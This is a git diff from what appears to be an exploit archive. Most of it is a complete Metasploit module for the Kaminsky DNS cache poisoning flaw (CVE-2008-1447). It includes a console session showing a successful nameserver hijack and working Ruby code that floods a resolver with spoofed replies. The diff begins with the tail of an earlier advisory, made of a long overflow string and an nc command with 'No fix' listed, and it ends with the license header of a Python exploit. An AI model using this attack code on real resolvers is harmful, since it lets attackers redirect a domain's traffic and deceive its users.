AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0 + + nc SERVER PORT -v -v < webmodz4.txt + +GET /auth.w. HTTP/1.0 + + +####################################################################### + +====== +4) Fix +====== + + +No fix + + +####################################################################### + +# milw0rm.com [2008-05-03] diff --git a/platforms/multiple/remote/6122.rb b/platforms/multiple/remote/6122.rb index 6104c7fd6..0230797da 100755 --- a/platforms/multiple/remote/6122.rb +++ b/platforms/multiple/remote/6122.rb @@ -1,472 +1,472 @@ - ____ ____ __ __ - / \ / \ | | | | - ----====####/ /\__\##/ /\ \##| |##| |####====---- - | | | |__| | | | | | - | | ___ | __ | | | | | - ------======######\ \/ /#| |##| |#| |##| |######======------ - \____/ |__| |__| \______/ - - Computer Academic Underground - http://www.caughq.org - Exploit Code - -===============/======================================================== -Exploit ID: CAU-EX-2008-0003 -Release Date: 2008.07.23 -Title: bailiwicked_domain.rb -Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains -Tested: BIND 9.4.1-9.4.2 -Attributes: Remote, Poison, Resolver, Metasploit -Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt -Author/Email: I)ruid - H D Moore -===============/======================================================== - -Description -=========== - -This exploit targets a fairly ubiquitous flaw in DNS implementations -which allow the insertion of malicious DNS records into the cache of the -target nameserver. This exploit caches a single malicious nameserver -entry into the target nameserver which replaces the legitimate -nameservers for the target domain. By causing the target nameserver to -query for random hostnames at the target domain, the attacker can spoof -a response to the target server including an answer for the query, an -authority server record, and an additional record for that server, -causing target nameserver to insert the additional record into the -cache. This insertion completely replaces the original nameserver -records for the target domain. - - -Example -======= - -# /msf3/msfconsole - - ## ### ## ## - ## ## #### ###### #### ##### ##### ## #### ###### -####### ## ## ## ## ## ## ## ## ## ## ### ## -####### ###### ## ##### #### ## ## ## ## ## ## ## -## # ## ## ## ## ## ## ##### ## ## ## ## ## -## ## #### ### ##### ##### ## #### #### #### ### - ## - - - =[ msf v3.2-release -+ -- --=[ 298 exploits - 124 payloads -+ -- --=[ 18 encoders - 6 nops - =[ 73 aux - -msf > use auxiliary/spoof/dns/bailiwicked_domain -msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D -RHOST => A.B.C.D -msf auxiliary(bailiwicked_domain) > set DOMAIN example.com -DOMAIN => example.com -msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com -NEWDNS => dns01.metasploit.com -msf auxiliary(bailiwicked_domain) > set SRCPORT 0 -SRCPORT => 0 -msf auxiliary(bailiwicked_domain) > check -[*] Using the Metasploit service to verify exploitability... -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] >> ADDRESS: A.B.C.D PORT: 50391 -[*] FAIL: This server uses static source ports and is vulnerable to poisoning -msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D -[*] exec: dig +short -t ns example.com @A.B.C.D - -b.iana-servers.net. -a.iana-servers.net. - -msf auxiliary(bailiwicked_domain) > run -[*] Switching to target port 50391 based on Metasploit service -[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com -[*] Querying recon nameserver for example.com.'s nameservers... -[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. -[*] Querying recon nameserver for address of b.iana-servers.net.... -[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 -[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... -[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as -[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. -[*] Querying recon nameserver for address of a.iana-servers.net.... -[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 -[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... -[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as -[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... -[*] Sent 1000 queries and 20000 spoofed responses... -[*] Sent 2000 queries and 40000 spoofed responses... -[*] Sent 3000 queries and 60000 spoofed responses... -[*] Sent 4000 queries and 80000 spoofed responses... -[*] Sent 5000 queries and 100000 spoofed responses... -[*] Sent 6000 queries and 120000 spoofed responses... -[*] Sent 7000 queries and 140000 spoofed responses... -[*] Sent 8000 queries and 160000 spoofed responses... -[*] Sent 9000 queries and 180000 spoofed responses... -[*] Sent 10000 queries and 200000 spoofed responses... -[*] Sent 11000 queries and 220000 spoofed responses... -[*] Sent 12000 queries and 240000 spoofed responses... -[*] Sent 13000 queries and 260000 spoofed responses... -[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com -[*] Auxiliary module execution completed - -msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D -[*] exec: dig +short -t ns example.com @A.B.C.D - -dns01.metasploit.com. - - -Credits -======= - -Dan Kaminsky is credited with originally discovering this vulnerability. - -Cedric Blancher figured out the NS injection method and -was cool enough to email us and share! - - -References -========== - -http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 -http://www.kb.cert.org/vuls/id/800113 - - -Metasploit -========== - -require 'msf/core' -require 'net/dns' -require 'scruby' -require 'resolv' - -module Msf - -class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary - - include Exploit::Remote::Ip - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DNS BailiWicked Domain Attack', - 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which - Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target - domains nameserver entries in a vulnerable DNS cache server. This attack works - by sending random hostname queries to the target DNS server coupled with spoofed - replies to those queries from the authoritative nameservers for that domain. - Eventually, a guessed ID will match, the spoofed packet will get accepted, and - the nameserver entries for the target domain will be replaced by the server - specified in the NEWDNS option of this exploit. - }, - 'Author' => - [ - ' I)ruid', 'hdm', - # - 'Cedric Blancher ' # Cedric figured out the NS injection method - # and was cool enough to email us and share! - # - ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 5591 $', - 'References' => - [ - [ 'CVE', '2008-1447' ], - [ 'US-CERT-VU', '8000113' ], - [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], - ], - 'DisclosureDate' => 'Jul 21 2008' - )) - - register_options( - [ - OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), - OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), - OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), - OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), - OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), - OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), - ], self.class) - - end - - def auxiliary_commands - return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } - end - - def cmd_check(*args) - targ = args[0] || rhost() - if(not (targ and targ.length > 0)) - print_status("usage: check [dns-server]") - return - end - - print_status("Using the Metasploit service to verify exploitability...") - srv_sock = Rex::Socket.create_udp( - 'PeerHost' => targ, - 'PeerPort' => 53 - ) - - random = false - ports = [] - lport = nil - - 1.upto(5) do |i| - - req = Resolv::DNS::Message.new - txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" - req.add_question(txt, Resolv::DNS::Resource::IN::TXT) - req.rd = 1 - - srv_sock.put(req.encode) - res, addr = srv_sock.recvfrom() - - - if res and res.length > 0 - res = Resolv::DNS::Message.decode(res) - res.each_answer do |name, ttl, data| - if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) - t_addr, t_port = $1.split(':') - - print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") - t_port = t_port.to_i - if(lport and lport != t_port) - random = true - end - lport = t_port - ports << t_port - end - end - end - end - - srv_sock.close - - if(ports.length < 5) - print_status("UNKNOWN: This server did not reply to our vulnerability check requests") - return - end - - if(random) - print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") - print_status(" This server may still be exploitable, but not by this tool.") - else - print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") - end - end - - def run - target = rhost() - source = Rex::Socket.source_address(target) - sport = datastore['SRCPORT'] - domain = datastore['DOMAIN'] + '.' - newdns = datastore['NEWDNS'] - recons = datastore['RECONS'] - xids = datastore['XIDS'].to_i - newttl = datastore['TTL'].to_i - xidbase = rand(20001) + 20000 - - address = Rex::Text.rand_text(4).unpack("C4").join(".") - - srv_sock = Rex::Socket.create_udp( - 'PeerHost' => target, - 'PeerPort' => 53 - ) - - # Get the source port via the metasploit service if it's not set - if sport.to_i == 0 - req = Resolv::DNS::Message.new - txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" - req.add_question(txt, Resolv::DNS::Resource::IN::TXT) - req.rd = 1 - - srv_sock.put(req.encode) - res, addr = srv_sock.recvfrom() - - if res and res.length > 0 - res = Resolv::DNS::Message.decode(res) - res.each_answer do |name, ttl, data| - if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) - t_addr, t_port = $1.split(':') - sport = t_port.to_i - - print_status("Switching to target port #{sport} based on Metasploit service") - if target != t_addr - print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") - end - end - end - end - end - - # Verify its not already poisoned - begin - query = Resolv::DNS::Message.new - query.add_question(domain, Resolv::DNS::Resource::IN::NS) - query.rd = 0 - - begin - cached = false - srv_sock.put(query.encode) - answer, addr = srv_sock.recvfrom() - - if answer and answer.length > 0 - answer = Resolv::DNS::Message.decode(answer) - answer.each_answer do |name, ttl, data| - - if((name.to_s + ".") == domain and data.name.to_s == newdns) - t = Time.now + ttl - print_status("Failure: This domain is already using #{newdns} as a nameserver") - print_status(" Cache entry expires on #{t.to_s}") - srv_sock.close - disconnect_ip - return - end - end - - end - end until not cached - rescue ::Interrupt - raise $! - rescue ::Exception => e - print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") - end - - - res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver - - print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}" - - # Look up the nameservers for the domain - print_status "Querying recon nameserver for #{domain}'s nameservers..." - answer0 = res0.send(domain, Net::DNS::NS) - #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" - - barbs = [] # storage for nameservers - answer0.answer.each do |rr0| - print_status " Got an #{rr0.type} record: #{rr0.inspect}" - if rr0.type == 'NS' - print_status " Querying recon nameserver for address of #{rr0.nsdname}..." - answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname - #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" - answer1.answer.each do |rr1| - print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) - print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." - answer2 = res2.send(domain) - if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 - nsrec = {:name => rr0.nsdname, :addr => rr1.address} - barbs << nsrec - print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" - end - end - end - end - - if barbs.length == 0 - print_status( "No DNS servers found.") - srv_sock.close - disconnect_ip - return - end - - # Flood the target with queries and spoofed responses, one will eventually hit - queries = 0 - responses = 0 - - connect_ip if not ip_sock - - print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") - - while true - randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname - - # Send spoofed query - req = Resolv::DNS::Message.new - req.id = rand(2**16) - req.add_question(randhost, Resolv::DNS::Resource::IN::A) - - req.rd = 1 - - buff = ( - Scruby::IP.new( - #:src => barbs[0][:addr].to_s, - :src => source, - :dst => target, - :proto => 17 - )/Scruby::UDP.new( - :sport => (rand((2**16)-1024)+1024).to_i, - :dport => 53 - )/req.encode - ).to_net - ip_sock.sendto(buff, target) - queries += 1 - - # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) - req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) - req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) - req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored - req.qr = 1 - req.aa = 1 - - xidbase.upto(xidbase+xids-1) do |id| - req.id = id - barbs.each do |barb| - buff = ( - Scruby::IP.new( - #:src => barbs[i][:addr].to_s, - :src => barb[:addr].to_s, - :dst => target, - :proto => 17 - )/Scruby::UDP.new( - :sport => 53, - :dport => sport.to_i - )/req.encode - ).to_net - ip_sock.sendto(buff, target) - responses += 1 - end - end - - # status update - if queries % 1000 == 0 - print_status("Sent #{queries} queries and #{responses} spoofed responses...") - end - - # every so often, check and see if the target is poisoned... - if queries % 250 == 0 - begin - query = Resolv::DNS::Message.new - query.add_question(domain, Resolv::DNS::Resource::IN::NS) - query.rd = 0 - - srv_sock.put(query.encode) - answer, addr = srv_sock.recvfrom() - - if answer and answer.length > 0 - answer = Resolv::DNS::Message.decode(answer) - answer.each_answer do |name, ttl, data| - if((name.to_s + ".") == domain and data.name.to_s == newdns) - print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") - srv_sock.close - disconnect_ip - return - end - end - end - rescue ::Interrupt - raise $! - rescue ::Exception => e - print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") - end - end - - end - - end - -end -end - -# milw0rm.com [2008-07-23] + ____ ____ __ __ + / \ / \ | | | | + ----====####/ /\__\##/ /\ \##| |##| |####====---- + | | | |__| | | | | | + | | ___ | __ | | | | | + ------======######\ \/ /#| |##| |#| |##| |######======------ + \____/ |__| |__| \______/ + + Computer Academic Underground + http://www.caughq.org + Exploit Code + +===============/======================================================== +Exploit ID: CAU-EX-2008-0003 +Release Date: 2008.07.23 +Title: bailiwicked_domain.rb +Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains +Tested: BIND 9.4.1-9.4.2 +Attributes: Remote, Poison, Resolver, Metasploit +Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt +Author/Email: I)ruid + H D Moore +===============/======================================================== + +Description +=========== + +This exploit targets a fairly ubiquitous flaw in DNS implementations +which allow the insertion of malicious DNS records into the cache of the +target nameserver. This exploit caches a single malicious nameserver +entry into the target nameserver which replaces the legitimate +nameservers for the target domain. By causing the target nameserver to +query for random hostnames at the target domain, the attacker can spoof +a response to the target server including an answer for the query, an +authority server record, and an additional record for that server, +causing target nameserver to insert the additional record into the +cache. This insertion completely replaces the original nameserver +records for the target domain. + + +Example +======= + +# /msf3/msfconsole + + ## ### ## ## + ## ## #### ###### #### ##### ##### ## #### ###### +####### ## ## ## ## ## ## ## ## ## ## ### ## +####### ###### ## ##### #### ## ## ## ## ## ## ## +## # ## ## ## ## ## ## ##### ## ## ## ## ## +## ## #### ### ##### ##### ## #### #### #### ### + ## + + + =[ msf v3.2-release ++ -- --=[ 298 exploits - 124 payloads ++ -- --=[ 18 encoders - 6 nops + =[ 73 aux + +msf > use auxiliary/spoof/dns/bailiwicked_domain +msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D +RHOST => A.B.C.D +msf auxiliary(bailiwicked_domain) > set DOMAIN example.com +DOMAIN => example.com +msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com +NEWDNS => dns01.metasploit.com +msf auxiliary(bailiwicked_domain) > set SRCPORT 0 +SRCPORT => 0 +msf auxiliary(bailiwicked_domain) > check +[*] Using the Metasploit service to verify exploitability... +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] >> ADDRESS: A.B.C.D PORT: 50391 +[*] FAIL: This server uses static source ports and is vulnerable to poisoning +msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D +[*] exec: dig +short -t ns example.com @A.B.C.D + +b.iana-servers.net. +a.iana-servers.net. + +msf auxiliary(bailiwicked_domain) > run +[*] Switching to target port 50391 based on Metasploit service +[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com +[*] Querying recon nameserver for example.com.'s nameservers... +[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. +[*] Querying recon nameserver for address of b.iana-servers.net.... +[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 +[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... +[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as +[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. +[*] Querying recon nameserver for address of a.iana-servers.net.... +[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 +[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... +[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as +[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... +[*] Sent 1000 queries and 20000 spoofed responses... +[*] Sent 2000 queries and 40000 spoofed responses... +[*] Sent 3000 queries and 60000 spoofed responses... +[*] Sent 4000 queries and 80000 spoofed responses... +[*] Sent 5000 queries and 100000 spoofed responses... +[*] Sent 6000 queries and 120000 spoofed responses... +[*] Sent 7000 queries and 140000 spoofed responses... +[*] Sent 8000 queries and 160000 spoofed responses... +[*] Sent 9000 queries and 180000 spoofed responses... +[*] Sent 10000 queries and 200000 spoofed responses... +[*] Sent 11000 queries and 220000 spoofed responses... +[*] Sent 12000 queries and 240000 spoofed responses... +[*] Sent 13000 queries and 260000 spoofed responses... +[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com +[*] Auxiliary module execution completed + +msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D +[*] exec: dig +short -t ns example.com @A.B.C.D + +dns01.metasploit.com. + + +Credits +======= + +Dan Kaminsky is credited with originally discovering this vulnerability. + +Cedric Blancher figured out the NS injection method and +was cool enough to email us and share! + + +References +========== + +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 +http://www.kb.cert.org/vuls/id/800113 + + +Metasploit +========== + +require 'msf/core' +require 'net/dns' +require 'scruby' +require 'resolv' + +module Msf + +class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary + + include Exploit::Remote::Ip + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS BailiWicked Domain Attack', + 'Description' => %q{ + This exploit attacks a fairly ubiquitous flaw in DNS implementations which + Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target + domains nameserver entries in a vulnerable DNS cache server. This attack works + by sending random hostname queries to the target DNS server coupled with spoofed + replies to those queries from the authoritative nameservers for that domain. + Eventually, a guessed ID will match, the spoofed packet will get accepted, and + the nameserver entries for the target domain will be replaced by the server + specified in the NEWDNS option of this exploit. + }, + 'Author' => + [ + ' I)ruid', 'hdm', + # + 'Cedric Blancher ' # Cedric figured out the NS injection method + # and was cool enough to email us and share! + # + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 5591 $', + 'References' => + [ + [ 'CVE', '2008-1447' ], + [ 'US-CERT-VU', '8000113' ], + [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], + ], + 'DisclosureDate' => 'Jul 21 2008' + )) + + register_options( + [ + OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), + OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), + OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), + OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), + OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), + OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), + ], self.class) + + end + + def auxiliary_commands + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } + end + + def cmd_check(*args) + targ = args[0] || rhost() + if(not (targ and targ.length > 0)) + print_status("usage: check [dns-server]") + return + end + + print_status("Using the Metasploit service to verify exploitability...") + srv_sock = Rex::Socket.create_udp( + 'PeerHost' => targ, + 'PeerPort' => 53 + ) + + random = false + ports = [] + lport = nil + + 1.upto(5) do |i| + + req = Resolv::DNS::Message.new + txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" + req.add_question(txt, Resolv::DNS::Resource::IN::TXT) + req.rd = 1 + + srv_sock.put(req.encode) + res, addr = srv_sock.recvfrom() + + + if res and res.length > 0 + res = Resolv::DNS::Message.decode(res) + res.each_answer do |name, ttl, data| + if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) + t_addr, t_port = $1.split(':') + + print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") + t_port = t_port.to_i + if(lport and lport != t_port) + random = true + end + lport = t_port + ports << t_port + end + end + end + end + + srv_sock.close + + if(ports.length < 5) + print_status("UNKNOWN: This server did not reply to our vulnerability check requests") + return + end + + if(random) + print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") + print_status(" This server may still be exploitable, but not by this tool.") + else + print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") + end + end + + def run + target = rhost() + source = Rex::Socket.source_address(target) + sport = datastore['SRCPORT'] + domain = datastore['DOMAIN'] + '.' + newdns = datastore['NEWDNS'] + recons = datastore['RECONS'] + xids = datastore['XIDS'].to_i + newttl = datastore['TTL'].to_i + xidbase = rand(20001) + 20000 + + address = Rex::Text.rand_text(4).unpack("C4").join(".") + + srv_sock = Rex::Socket.create_udp( + 'PeerHost' => target, + 'PeerPort' => 53 + ) + + # Get the source port via the metasploit service if it's not set + if sport.to_i == 0 + req = Resolv::DNS::Message.new + txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" + req.add_question(txt, Resolv::DNS::Resource::IN::TXT) + req.rd = 1 + + srv_sock.put(req.encode) + res, addr = srv_sock.recvfrom() + + if res and res.length > 0 + res = Resolv::DNS::Message.decode(res) + res.each_answer do |name, ttl, data| + if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) + t_addr, t_port = $1.split(':') + sport = t_port.to_i + + print_status("Switching to target port #{sport} based on Metasploit service") + if target != t_addr + print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") + end + end + end + end + end + + # Verify its not already poisoned + begin + query = Resolv::DNS::Message.new + query.add_question(domain, Resolv::DNS::Resource::IN::NS) + query.rd = 0 + + begin + cached = false + srv_sock.put(query.encode) + answer, addr = srv_sock.recvfrom() + + if answer and answer.length > 0 + answer = Resolv::DNS::Message.decode(answer) + answer.each_answer do |name, ttl, data| + + if((name.to_s + ".") == domain and data.name.to_s == newdns) + t = Time.now + ttl + print_status("Failure: This domain is already using #{newdns} as a nameserver") + print_status(" Cache entry expires on #{t.to_s}") + srv_sock.close + disconnect_ip + return + end + end + + end + end until not cached + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") + end + + + res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver + + print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}" + + # Look up the nameservers for the domain + print_status "Querying recon nameserver for #{domain}'s nameservers..." + answer0 = res0.send(domain, Net::DNS::NS) + #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" + + barbs = [] # storage for nameservers + answer0.answer.each do |rr0| + print_status " Got an #{rr0.type} record: #{rr0.inspect}" + if rr0.type == 'NS' + print_status " Querying recon nameserver for address of #{rr0.nsdname}..." + answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname + #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" + answer1.answer.each do |rr1| + print_status " Got an #{rr1.type} record: #{rr1.inspect}" + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." + answer2 = res2.send(domain) + if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 + nsrec = {:name => rr0.nsdname, :addr => rr1.address} + barbs << nsrec + print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" + end + end + end + end + + if barbs.length == 0 + print_status( "No DNS servers found.") + srv_sock.close + disconnect_ip + return + end + + # Flood the target with queries and spoofed responses, one will eventually hit + queries = 0 + responses = 0 + + connect_ip if not ip_sock + + print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") + + while true + randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname + + # Send spoofed query + req = Resolv::DNS::Message.new + req.id = rand(2**16) + req.add_question(randhost, Resolv::DNS::Resource::IN::A) + + req.rd = 1 + + buff = ( + Scruby::IP.new( + #:src => barbs[0][:addr].to_s, + :src => source, + :dst => target, + :proto => 17 + )/Scruby::UDP.new( + :sport => (rand((2**16)-1024)+1024).to_i, + :dport => 53 + )/req.encode + ).to_net + ip_sock.sendto(buff, target) + queries += 1 + + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) + req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) + req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) + req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored + req.qr = 1 + req.aa = 1 + + xidbase.upto(xidbase+xids-1) do |id| + req.id = id + barbs.each do |barb| + buff = ( + Scruby::IP.new( + #:src => barbs[i][:addr].to_s, + :src => barb[:addr].to_s, + :dst => target, + :proto => 17 + )/Scruby::UDP.new( + :sport => 53, + :dport => sport.to_i + )/req.encode + ).to_net + ip_sock.sendto(buff, target) + responses += 1 + end + end + + # status update + if queries % 1000 == 0 + print_status("Sent #{queries} queries and #{responses} spoofed responses...") + end + + # every so often, check and see if the target is poisoned... + if queries % 250 == 0 + begin + query = Resolv::DNS::Message.new + query.add_question(domain, Resolv::DNS::Resource::IN::NS) + query.rd = 0 + + srv_sock.put(query.encode) + answer, addr = srv_sock.recvfrom() + + if answer and answer.length > 0 + answer = Resolv::DNS::Message.decode(answer) + answer.each_answer do |name, ttl, data| + if((name.to_s + ".") == domain and data.name.to_s == newdns) + print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") + srv_sock.close + disconnect_ip + return + end + end + end + rescue ::Interrupt + raise $! + rescue ::Exception => e + print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") + end + end + + end + + end + +end +end + +# milw0rm.com [2008-07-23] diff --git a/platforms/multiple/remote/6123.py b/platforms/multiple/remote/6123.py index cc94de272..9a5b4c54c 100755 --- a/platforms/multiple/remote/6123.py +++ b/platforms/multiple/remote/6123.py @@ -1,112 +1,112 @@ -from scapy import * -import random - -# Copyright (C) 2008 Julien Desfossez -# http://www.solisproject.net/ -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 